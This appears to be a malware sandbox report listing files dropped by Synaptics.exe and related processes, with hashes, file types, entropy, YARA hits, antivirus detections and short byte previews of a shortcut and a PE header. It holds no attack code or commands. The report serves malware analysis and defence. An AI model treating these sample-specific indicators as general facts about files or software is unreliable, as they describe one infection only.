                                                                                                                                                                                                                          MD5:2EC6D02BC24F3CBCF138E77C18D63CE2
                                                                                                                                                                                                                          SHA1:4AF05824DF9A13E2B5516E620F724839CA4515BF
                                                                                                                                                                                                                          SHA-256:EA55864C1F586EEC4423D483518C866D583552A7B23783A7DD23BDDCCC63DFEA
                                                                                                                                                                                                                          SHA-512:AEDF9BA99E0F5CE5B6F05D2F14DAF861669A7322C2D89B70603509D0A6107EFE91DF3CC27E81CF0943EFC3D6498365350683CED44117975A9EE3545D8C158B2D
                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                          Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                                                                          File Type:HTML document, UTF-8 Unicode text, with very long lines, with no line terminators
                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                          Size (bytes):1642
                                                                                                                                                                                                                          Entropy (8bit):5.25999015877655
                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                          SSDEEP:24:bsF+0VSU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:bK+K+pAZewRDK4mW
                                                                                                                                                                                                                          MD5:CDAD74A4440693FE98FF06D1C92F8264
                                                                                                                                                                                                                          SHA1:04E96DB5A6D5DF6C8E6ABD706D9F85AFE32C1691
                                                                                                                                                                                                                          SHA-256:0CDA8EAA8B2B3B3C8CAED6449AFD34516F1AC6BD3EA2E3FE7853CA563F7BD624
                                                                                                                                                                                                                          SHA-512:6DED5DD7ECFF6E017839C772DFB464B815301496909178016DF7BADD8E6B42A31027C5B581B836FF5170437850F9E2CCBEC5841192ABFF0A3E998750752FD929
                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                          Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                                                                          File Type:HTML document, UTF-8 Unicode text, with very long lines, with no line terminators
                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                          Size (bytes):1642
                                                                                                                                                                                                                          Entropy (8bit):5.265093555739085
                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                          SSDEEP:24:bsF+0RSU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:bK+W+pAZewRDK4mW
                                                                                                                                                                                                                          MD5:40541C44E1A2C92BBB011980646390BD
                                                                                                                                                                                                                          SHA1:E8CB7690FAEEA6EB26377114E68AA888E08EDB5D
                                                                                                                                                                                                                          SHA-256:0945F65B1D726D99B2AF379BD9345FDF5CF72D90E67F41B0A2D196F7C9BBC0B9
                                                                                                                                                                                                                          SHA-512:1FBA270CA7A4FDF7EFF856F7460F6579399E4F9E53F78B4D58A0A47F6781601266C5C8DEFA349F157A8B4C44616D3E5B9C6695F5A7990D8DAB26F3518D872284
                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                          Process:C:\Users\user\Desktop\._cache_uniformerede.exe
                                                                                                                                                                                                                          File Type:data
                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                          Size (bytes):387599
                                                                                                                                                                                                                          Entropy (8bit):7.923786371334464
                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                          SSDEEP:6144:zqGNqFRp81ckmvkdQ3Px8PjVWLAefmp88Q7YBy69ZrNlCTif9zUCIpkbrZFV:ea5svkdQfx8PjVWUem2YBy6LrNITiVzz
                                                                                                                                                                                                                          MD5:4AAB1798D3B3A95F833CB8A3EBBD45B5
                                                                                                                                                                                                                          SHA1:07C3BD47B41080B20A7D05543E8B055AD0CAA3E1
                                                                                                                                                                                                                          SHA-256:3B171F2E59DFDFDA8F1198FF352A15E65ADCED5F7148795369489179A58D6DB0
                                                                                                                                                                                                                          SHA-512:764B2D517ADA103BAC727775DCAE3F2AEF1E38649587EFF5A3D31E039E1E2C519054082F8EF508E71B3A32D5A2AAC531601867A3A3CF9D4BA5C677F47A01F32A
                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                          Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                                                                          File Type:HTML document, UTF-8 Unicode text, with very long lines, with no line terminators
                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                          Size (bytes):1642
                                                                                                                                                                                                                          Entropy (8bit):5.264699310392705
                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                          SSDEEP:24:bsF+035YDSU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:bK+YY+pAZewRDK4mW
                                                                                                                                                                                                                          MD5:0E40F1B3BE2664251A057C3C25F8B40C
                                                                                                                                                                                                                          SHA1:CF6DDA64F15CAFE718359A496DF91EBA631901E2
                                                                                                                                                                                                                          SHA-256:E99333046DF17A07F917AE29132218E35857E325FB2F40F81ED003FBB281D8B4
                                                                                                                                                                                                                          SHA-512:3FC5D03F616AA47D07026A985C07B21B0FF0F5C47377AD0D4D973E9D988E217EC17A63AABAFB94863DFB12E6CF4DC318B7C091262A8B3E3E356AA376FAB5FFF4
                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                          Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                                                                          File Type:HTML document, UTF-8 Unicode text, with very long lines, with no line terminators
                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                          Size (bytes):1642
                                                                                                                                                                                                                          Entropy (8bit):5.255533734344521
                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                          SSDEEP:24:bsF+0cSU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:bK+f+pAZewRDK4mW
                                                                                                                                                                                                                          MD5:DD6782F34D39587DF9A63777FAECA595
                                                                                                                                                                                                                          SHA1:D3935DE2AC954B7F19372020F25E844EED74450F
                                                                                                                                                                                                                          SHA-256:34C81BAAE33FFAF55720E9575AF7F203887FACD303DE421ABBDE4CAD946DF5B9
                                                                                                                                                                                                                          SHA-512:E7D097D9BB845E593BFFAE20F04969BD0C82D4D23E816DC8C05A359CCA68CED2F29E70DB0457CE7D86B5B51C9721324BDD6AFEE270D3ABC7B0D21C7EE18775AC
                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                          Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                                                                          File Type:HTML document, UTF-8 Unicode text, with very long lines, with no line terminators
                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                          Size (bytes):1642
                                                                                                                                                                                                                          Entropy (8bit):5.27651127842957
                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                          SSDEEP:24:bsF+05SU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:bK+K+pAZewRDK4mW
                                                                                                                                                                                                                          MD5:9E40F5F14B4F270901DA7439511A82A3
                                                                                                                                                                                                                          SHA1:D5F454B26EDFDE8939F94AEA30D5C32D39BC9A25
                                                                                                                                                                                                                          SHA-256:E01B891EB7E80E95E7AD94B530E4F2246A0EC1DF87CAE6E629D0B76223F8DE84
                                                                                                                                                                                                                          SHA-512:1BB1CDC37A212C6503A7BDFDC73DA742CEF271DFE8DBD62A0BADB1DA2398DCCD617693809312B4F66BF6EAB6DBD111B99BF950A099FB911487FCAE5B933B18B1
                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                          Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                                                                          File Type:HTML document, UTF-8 Unicode text, with very long lines, with no line terminators
                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                          Size (bytes):1642
                                                                                                                                                                                                                          Entropy (8bit):5.259950883259115
                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                          SSDEEP:24:bsF+0vSU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:bK+8+pAZewRDK4mW
                                                                                                                                                                                                                          MD5:7EE89D6391026DF4F7831C95A0D0D2D3
                                                                                                                                                                                                                          SHA1:AACB402DE6CA661E9346EDBAF8E25E0668E71B85
                                                                                                                                                                                                                          SHA-256:7DD1E65FD2E54204988F375A511A39CA731E409D5BC85FC3D522A7CBD5C6C82B
                                                                                                                                                                                                                          SHA-512:D9F4D96A8ACE8C4B514366AAE9F9D8605BFDFD3FBA2747F24B9BC93D44D9FD16894D44DCBA84CC4E279AF63DFE09523BD30942E1A06FD3A5EB64B0F510F08A69
                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                          Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                                                                          File Type:HTML document, UTF-8 Unicode text, with very long lines, with no line terminators
                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                          Size (bytes):1642
                                                                                                                                                                                                                          Entropy (8bit):5.266186102482499
                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                          SSDEEP:24:bsF+0VbSU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:bK+K+pAZewRDK4mW
                                                                                                                                                                                                                          MD5:951AF258DBAE8260C49BB520432A78DE
                                                                                                                                                                                                                          SHA1:016D5366299873206982A115616B35A7F5F7C077
                                                                                                                                                                                                                          SHA-256:5CFB033F81E0E29DDB3AD643CF1E51C48379648953DFC6C95815F8DBCA01ACFC
                                                                                                                                                                                                                          SHA-512:18E5B34B61B754A5D67F36D53529A4F5BC1350B2307E40AA96E00768257448158BA3E2ACF331B85D92C8E3222C52D4CD5271CD6F4CBFCDD894178960BA618D82
                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                          Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                                                                          File Type:HTML document, UTF-8 Unicode text, with very long lines, with no line terminators
                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                          Size (bytes):1642
                                                                                                                                                                                                                          Entropy (8bit):5.266280444801442
                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                          SSDEEP:24:bsF+0QDUSU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:bK+u+pAZewRDK4mW
                                                                                                                                                                                                                          MD5:73B8E5C9530F9B089BDC0E8BD4C55E82
                                                                                                                                                                                                                          SHA1:D0CE08FDA40B66BD46CA476A315F83A615EDF44B
                                                                                                                                                                                                                          SHA-256:910FD2969B0D31D04CE0D720A60310FC30E0397A73516D079CA3D32949FBEC2B
                                                                                                                                                                                                                          SHA-512:7A93F0FB3987222C12E9377F3E5697B4B63289C27DA6099361100B161C100A398AFA634F233D42E84DC0C74042043BA2A9A281D5A3D2F4EA0DE49A82C0EC9024
                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                          Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                                                                          File Type:HTML document, UTF-8 Unicode text, with very long lines, with no line terminators
                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                          Size (bytes):1642
                                                                                                                                                                                                                          Entropy (8bit):5.264545281101612
                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                          SSDEEP:24:bsF+08SU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:bK+X+pAZewRDK4mW
                                                                                                                                                                                                                          MD5:1C68CB7AFAAC18F9B253C9BFAA1A4A77
                                                                                                                                                                                                                          SHA1:147297220FC5CD3DB80FB9DBFCEDBEF1F7AE957B
                                                                                                                                                                                                                          SHA-256:B0008F58F98D780737C82F7CB2AACB591AB45B2DA477920166465D49BF4F6B9B
                                                                                                                                                                                                                          SHA-512:FEA84EE5FA3D51E32322F74BE240DA3D808D5D2AE8EEC20E6CDB8531E5D34ED592C6A7FA4980F282ECD0EB88A317026797C2F8D8FCAE8FD445A58755D4EC4AF8
                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                          Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                                                                          File Type:Microsoft Excel 2007+
                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                          Size (bytes):18387
                                                                                                                                                                                                                          Entropy (8bit):7.523057953697544
                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                          SSDEEP:384:oUaZLPzMfVSa1VvYXmrsdPkLmDAx7r/l0:oUatwNSSvY2IdsHr/y
                                                                                                                                                                                                                          MD5:E566FC53051035E1E6FD0ED1823DE0F9
                                                                                                                                                                                                                          SHA1:00BC96C48B98676ECD67E81A6F1D7754E4156044
                                                                                                                                                                                                                          SHA-256:8E574B4AE6502230C0829E2319A6C146AEBD51B7008BF5BBFB731424D7952C15
                                                                                                                                                                                                                          SHA-512:A12F56FF30EA35381C2B8F8AF2446CF1DAA21EE872E98CAD4B863DB060ACD4C33C5760918C277DADB7A490CB4CA2F925D59C70DC5171E16601A11BC4A6542B04
                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                          Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                                                                          File Type:HTML document, UTF-8 Unicode text, with very long lines, with no line terminators
                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                          Size (bytes):1642
                                                                                                                                                                                                                          Entropy (8bit):5.256244874729158
                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                          SSDEEP:24:bsF+0dclISU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:bK+sclI+pAZewRDK4mW
                                                                                                                                                                                                                          MD5:B552D4446D24C0E0360ABDA8E674FA5A
                                                                                                                                                                                                                          SHA1:88301C130D245EC9B011507B3AF2E12F2F3056DC
                                                                                                                                                                                                                          SHA-256:51B049D1E454DBC7329297F223F3F507F35BF1D72350C31B4604415576085D64
                                                                                                                                                                                                                          SHA-512:D68FCB0639B37DF5DCEC8AB31B72A28410A19D740BD919A2F962E96128E1494A5CD3B78BB066D38D8222E81ADB754635C661CB8A40653BE9F1C01B71DFC0BC7C
                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                          Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                                                                          File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                          Size (bytes):2262528
                                                                                                                                                                                                                          Entropy (8bit):7.489402973820276
                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                          SSDEEP:49152:onsHyjtk2MYC5GDqso5AJs+gYGh3JfEwVu4H:onsmtk2a/5AJJcEws4H
                                                                                                                                                                                                                          MD5:65B8E77E293A905F0AC7289E01DCB715
                                                                                                                                                                                                                          SHA1:C4326E7DE95466D022BFC4B79D5BC9CC3859DE84
                                                                                                                                                                                                                          SHA-256:0BC82DCB41571412B308716DB19E9F721A7A304B1BEE76A3B9AFB327B32612F8
                                                                                                                                                                                                                          SHA-512:167644568729A90BCD31F58D454D9C7182EB167EDE37C818BCC33665AE48249343AFA092937CE8D854D254C975DC98437268C8E51B0ED2C5E7C85A5F1F189108
                                                                                                                                                                                                                          Malicious:true
                                                                                                                                                                                                                          Yara Hits:
                                                                                                                                                                                                                          • Rule: JoeSecurity_DelphiSystemParamCount, Description: Detected Delphi use of System.ParamCount(), Source: C:\Users\user\AppData\Local\Temp\RCXDA77.tmp, Author: Joe Security
                                                                                                                                                                                                                          Antivirus:
                                                                                                                                                                                                                          • Antivirus: Avira, Detection: 100%
                                                                                                                                                                                                                          • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                                                                          Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                                                                          File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                          Size (bytes):2262528
                                                                                                                                                                                                                          Entropy (8bit):7.487265723978036
                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                          SSDEEP:49152:onsHyjtk2MYC5GDzso5AJs+gYGh3JfEwVu4H:onsmtk2aS5AJJcEws4H
                                                                                                                                                                                                                          MD5:FA4C249127C8D6D3661A369551570EB3
                                                                                                                                                                                                                          SHA1:BB1FAA2CD5C36DC224BF162B6C7D381F91A49431
                                                                                                                                                                                                                          SHA-256:4B7D1627FBFEFB6B1E47A2AF6E4EC95A542C219EACA1AEF57949FA76378D65A1
                                                                                                                                                                                                                          SHA-512:141F2CDE2F424B8883203463AC093B5789A6C2C2B359CA6CF54E9FA8068F91354CC6873DD885CDC92B60D524C9E9080A710036E39764F4931586F38599A32063
                                                                                                                                                                                                                          Malicious:true
                                                                                                                                                                                                                          Yara Hits:
                                                                                                                                                                                                                          • Rule: JoeSecurity_DelphiSystemParamCount, Description: Detected Delphi use of System.ParamCount(), Source: C:\Users\user\AppData\Local\Temp\RCXF979.tmp, Author: Joe Security
                                                                                                                                                                                                                          Antivirus:
                                                                                                                                                                                                                          • Antivirus: Avira, Detection: 100%
                                                                                                                                                                                                                          • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                                                                          Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                                                                          File Type:HTML document, UTF-8 Unicode text, with very long lines, with no line terminators
                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                          Size (bytes):1642
                                                                                                                                                                                                                          Entropy (8bit):5.27105939027754
                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                          SSDEEP:24:bsF+0oSU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:bK+n+pAZewRDK4mW
                                                                                                                                                                                                                          MD5:DC79684C67DB88D6BDAD338CC8F33238
                                                                                                                                                                                                                          SHA1:FCC271B2BD3B132022BC39DA2AD5508BBBFD8D8C
                                                                                                                                                                                                                          SHA-256:7B3F6C53CDCE17EC2A2F675746B40DD04BC08651D883ECB1FA3A04D13B4D64D4
                                                                                                                                                                                                                          SHA-512:C5013F45A7B7528F396D55998106CDC8B85E2381928786449B80FA6FEB3E0DEB7F5802D97AF59A1D3CD93BF81A3407FB64CD963E4E0ED7E773C9B235D25EDE6F
                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                          Process:C:\Users\user\Desktop\._cache_uniformerede.exe
                                                                                                                                                                                                                          File Type:MS Windows shortcut, Item id list present, Has Relative path, Has Working directory, ctime=Sun Dec 31 23:06:32 1600, mtime=Sun Dec 31 23:06:32 1600, atime=Sun Dec 31 23:06:32 1600, length=0, window=hide
                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                          Size (bytes):954
                                                                                                                                                                                                                          Entropy (8bit):3.026195870563083
                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                          SSDEEP:12:8wl0ksXou41w/tz+7RafgKDDAl2RW3MvW3ME3qQ18/3NJkKAd4t2Y+xIBjK:8jf4eaRMgKXOftHLS9HAv7aB
                                                                                                                                                                                                                          MD5:CC1F1A79320338AFABD0947DE0744BCD
                                                                                                                                                                                                                          SHA1:53780A426BE2BCA09043E5EEB1AEBC4651FAC0F6
                                                                                                                                                                                                                          SHA-256:2AE7C3D23C798A2CA5B95AE8957F0BF23A83E8613E165526986123500F69BCF3
                                                                                                                                                                                                                          SHA-512:78017EF850E40D49CE5C2B459CEB101E30647619EDD0F68E9A44B7E2EB098621B973A6514F474239C695565D42700ABED6C35A3BDCD4A5B3BA029E9BE29BA8AC
                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                          Preview:L..................F........................................................7....P.O. .:i.....+00.../C:\...................P.1...........Users.<............................................U.s.e.r.s.....P.1...........user.<............................................h.a.r.d.z.....V.1...........AppData.@............................................A.p.p.D.a.t.a.....P.1...........Local.<............................................L.o.c.a.l.....N.1...........Temp..:............................................T.e.m.p.....t.2...........Dansehesten98.exe.T............................................D.a.n.s.e.h.e.s.t.e.n.9.8...e.x.e... .......\.D.a.n.s.e.h.e.s.t.e.n.9.8...e.x.e.!.C.:.\.U.s.e.r.s.\.h.a.r.d.z.\.A.p.p.D.a.t.a.\.L.o.c.a.l.\.T.e.m.p.........(.................l^".`G...3..qs................1SPS.XF.L8C....&.m.q............/...S.-.1.-.5.-.2.1.-.3.8.5.3.3.2.1.9.3.5.-.2.1.2.5.5.6.3.2.0.9.-.4.0.5.3.0.6.2.3.3.2.-.1.0.0.2.................
                                                                                                                                                                                                                          Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                                                                          File Type:HTML document, UTF-8 Unicode text, with very long lines, with no line terminators
                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                          Size (bytes):1642
                                                                                                                                                                                                                          Entropy (8bit):5.255451488331643
                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                          SSDEEP:24:bsF+0ErSU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:bK+7+pAZewRDK4mW
                                                                                                                                                                                                                          MD5:FD58B50DF74A98E3CE307B686FF10A1F
                                                                                                                                                                                                                          SHA1:3BB2373822783BB728FC46C377368116D3688DF3
                                                                                                                                                                                                                          SHA-256:358BB4E4BC103F18FE910C9AC6EA0475D278CE1AE607F939E366F32A98B348EB
                                                                                                                                                                                                                          SHA-512:29C5415E00C2C4F5B69DDA03DE1B5F5D53777CBD79685F1EBAADB79ABC6C46CE6CF5E704A06AC54C0883C1D1D1C3DA497ACCA5130E0263232937F2B0BD262E48
                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                          Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                                                                          File Type:HTML document, UTF-8 Unicode text, with very long lines, with no line terminators
                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                          Size (bytes):1642
                                                                                                                                                                                                                          Entropy (8bit):5.2675017651506595
                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                          SSDEEP:24:bsF+0lSU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:bK+i+pAZewRDK4mW
                                                                                                                                                                                                                          MD5:E2758FD1176B9AD6ED0FF37218FEEADD
                                                                                                                                                                                                                          SHA1:4398397BDD01476D7941382F3CF970E6E782BCBC
                                                                                                                                                                                                                          SHA-256:FB5FDF88CBA7C5609DB0C30E70BA6B04A91C37DCDB18F13522973BA79F89AE9A
                                                                                                                                                                                                                          SHA-512:EAD4FC74ADAF6D7BA72CCD5AA699569731C1BAB5603B859930D0130D73FF2C4F33CB972C95DED8299E7C97735063D2606D944EBD6E339F88BF6255DC161AEC31
                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                          Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                                                                          File Type:HTML document, UTF-8 Unicode text, with very long lines, with no line terminators
                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                          Size (bytes):1642
                                                                                                                                                                                                                          Entropy (8bit):5.2583066645133645
                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                          SSDEEP:24:bsF+01+jSU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:bK+nj+pAZewRDK4mW
                                                                                                                                                                                                                          MD5:4A3172B7B315A3184E83E3DA82A7A8F6
                                                                                                                                                                                                                          SHA1:CF4388AAE5812EC2C4125C7704665CDC897E3487
                                                                                                                                                                                                                          SHA-256:68E85F5B7F2E62C75DC638710D00678D2EF573BBCCB33786A1112D0C870D0658
                                                                                                                                                                                                                          SHA-512:E0189983E9A27DA0301D724B185D72C08898900CB7E1B4B0A0E33629F320A44106C0D523E5B9F55CBBDDAF0229EA783CD949E7E248658647FBFF91A979E07A93
                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                          Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                                                                          File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                          Size (bytes):771584
                                                                                                                                                                                                                          Entropy (8bit):6.644060003425038
                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                          SSDEEP:12288:aMSApJVYG5lDLyjsb0eOzkv4R7QnvUUilQ35+6G75V9I4r:ansJ39LyjbJkQFMhmC+6GD9j
                                                                                                                                                                                                                          MD5:2A1D1C20CCA885322254DD2A22F51097
                                                                                                                                                                                                                          SHA1:B1E3866401ECA22981F985C17CB4CD9C36F85486
                                                                                                                                                                                                                          SHA-256:2B88A30E06873F61842038EC6C0E51B954DB482CD4641E33F01B3E80AF9F168D
                                                                                                                                                                                                                          SHA-512:ED72F56294BDF292A6EB1953CD657842CCFA2DCF3C5E69F24A1B11E19E5D8BD73DA5AAFB5F171CE91DBB07776CF8C2BF9028035E152E2CC8311A3CD21E51A886
                                                                                                                                                                                                                          Malicious:true
                                                                                                                                                                                                                          Yara Hits:
                                                                                                                                                                                                                          • Rule: JoeSecurity_DelphiSystemParamCount, Description: Detected Delphi use of System.ParamCount(), Source: C:\Users\user\AppData\Local\Temp\YC9w8Aif.exe, Author: Joe Security
                                                                                                                                                                                                                          Antivirus:
                                                                                                                                                                                                                          • Antivirus: Avira, Detection: 100%
                                                                                                                                                                                                                          • Antivirus: Avira, Detection: 100%
                                                                                                                                                                                                                          • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                                                                          Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*.....................&....................@.......................... ...................@..............................B*...........................P...............@..!............@......................................................CODE............................... ..`DATA....T........0..................@...BSS......................................idata..B*.......,..................@....tls.........0...........................rdata..9....@......................@..P.reloc.......P......................@..P.rsrc...............................@..P....................................@..P........................................................................................................................................
                                                                                                                                                                                                                          Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                                                                          File Type:MS Windows icon resource - 1 icon, 32x32, 32 colors
                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                          Size (bytes):4286
                                                                                                                                                                                                                          Entropy (8bit):4.355890074651617
                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                          SSDEEP:24:G8IhVsAOVS+3P7sZqt8+7tCSWhlTB/ryOLkTJNzyyyyyyyUH/seOY8k9H09kI27:SJOVhzU0tBOVTyOLsfFWeUH27
                                                                                                                                                                                                                          MD5:076675FE01F793F7DFFE82D24F4E806A
                                                                                                                                                                                                                          SHA1:2E2E04D353C34A60E3B5CCBE0C3D120FE719B656
                                                                                                                                                                                                                          SHA-256:CB54C21B707D3879D091A49D459B1BE287B922952286B55EF1DFB7249C21A93C
                                                                                                                                                                                                                          SHA-512:B8720EA4D858777C91ED355C6D3C04B7DCF3A8318A044400A1C1FF10A06FA91E2A8446B900E910D41CDE9FCDB64FDDEF5F4BAD3FFAEE1CDA3D27457EF849DD0C
                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                          Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                          File Type:very short file (no magic)
                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                          Size (bytes):1
                                                                                                                                                                                                                          Entropy (8bit):0.0
                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                          SSDEEP:3:U:U
                                                                                                                                                                                                                          MD5:C4CA4238A0B923820DCC509A6F75849B
                                                                                                                                                                                                                          SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                                                                                                                                                                                          SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                                                                                                                                                                                          SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                          Preview:1
                                                                                                                                                                                                                          Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                          File Type:very short file (no magic)
                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                          Size (bytes):1
                                                                                                                                                                                                                          Entropy (8bit):0.0
                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                          SSDEEP:3:U:U
                                                                                                                                                                                                                          MD5:C4CA4238A0B923820DCC509A6F75849B
                                                                                                                                                                                                                          SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                                                                                                                                                                                          SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                                                                                                                                                                                          SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                          Preview:1
                                                                                                                                                                                                                          Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                          File Type:very short file (no magic)
                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                          Size (bytes):1
                                                                                                                                                                                                                          Entropy (8bit):0.0
                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                          SSDEEP:3:U:U
                                                                                                                                                                                                                          MD5:C4CA4238A0B923820DCC509A6F75849B
                                                                                                                                                                                                                          SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                                                                                                                                                                                          SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                                                                                                                                                                                          SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                          Preview:1
